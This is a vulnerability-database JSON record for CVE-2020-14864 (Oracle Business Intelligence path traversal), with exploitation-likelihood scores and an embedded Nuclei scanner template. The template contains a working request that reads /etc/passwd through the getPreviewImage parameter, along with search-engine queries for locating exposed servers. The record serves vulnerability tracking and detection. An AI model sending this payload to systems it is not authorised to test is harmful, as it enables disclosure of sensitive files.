{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2020-14864/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2020-14864/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2020-14864/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2020-14864/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2020-14864/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2020-14864"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2020-14864"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": true
    },
    "epss": {
      "epss": 0.97233,
      "kev": true,
      "percentile": 0.99892
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2020/CVE-2020-14864.yaml",
      "nuclei_template_severity": "high",
      "nuclei_template_yaml": "id: CVE-2020-14864\n\ninfo:\n  name: Oracle Fusion - Directory Traversal/Local File Inclusion\n  author: Ivo Palazzolo (@palaziv)\n  severity: high\n  description: Oracle Business Intelligence Enterprise Edition 5.5.0.0.0, 12.2.1.3.0, and 12.2.1.4.0 are vulnerable to local file inclusion vulnerabilities via \"getPreviewImage.\"\n  impact: |\n    Successful exploitation of this vulnerability could allow an attacker to read sensitive files, execute arbitrary code, or gain unauthorized access to the system.\n  remediation: |\n    Apply the latest security patches and updates provided by Oracle to fix this vulnerability.\n  reference:\n    - http://packetstormsecurity.com/files/159748/Oracle-Business-Intelligence-Enterprise-Edition-5.5.0.0.0-12.2.1.3.0-12.2.1.4.0-LFI.html\n    - https://www.oracle.com/security-alerts/cpuoct2020.html\n    - https://nvd.nist.gov/vuln/detail/CVE-2020-14864\n    - https://github.com/merlinepedra/nuclei-templates\n    - https://github.com/sobinge/nuclei-templates\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2020-14864\n    cwe-id: CWE-22\n    epss-score: 0.97233\n    epss-percentile: 0.99892\n    cpe: cpe:2.3:a:oracle:business_intelligence:5.5.0.0.0:*:*:*:enterprise:*:*:*\n  metadata:\n    max-request: 2\n    vendor: oracle\n    product: business_intelligence\n    shodan-query: http.title:\"oracle business intelligence sign in\"\n    fofa-query: title=\"oracle business intelligence sign in\"\n    google-query: intitle:\"oracle business intelligence sign in\"\n  tags: cve,cve2020,oracle,lfi,kev,packetstorm,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - '{{BaseURL}}/analytics/saw.dll?bieehome&startPage=1'\n      - '{{BaseURL}}/analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd'\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        part: body\n        regex:\n          - 'root:.*:0:0:'\n\n      - type: status\n        status:\n          - 200\n# digest: 490a00463044022038c864aea72b8e9bae6fde8404946fa8ae199d5016ec9254ea075ecc3316e954022075885359b4c321536078265a0fbf9477bbfb400edf82f953eb0602f6382b493b:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2020-14864"
}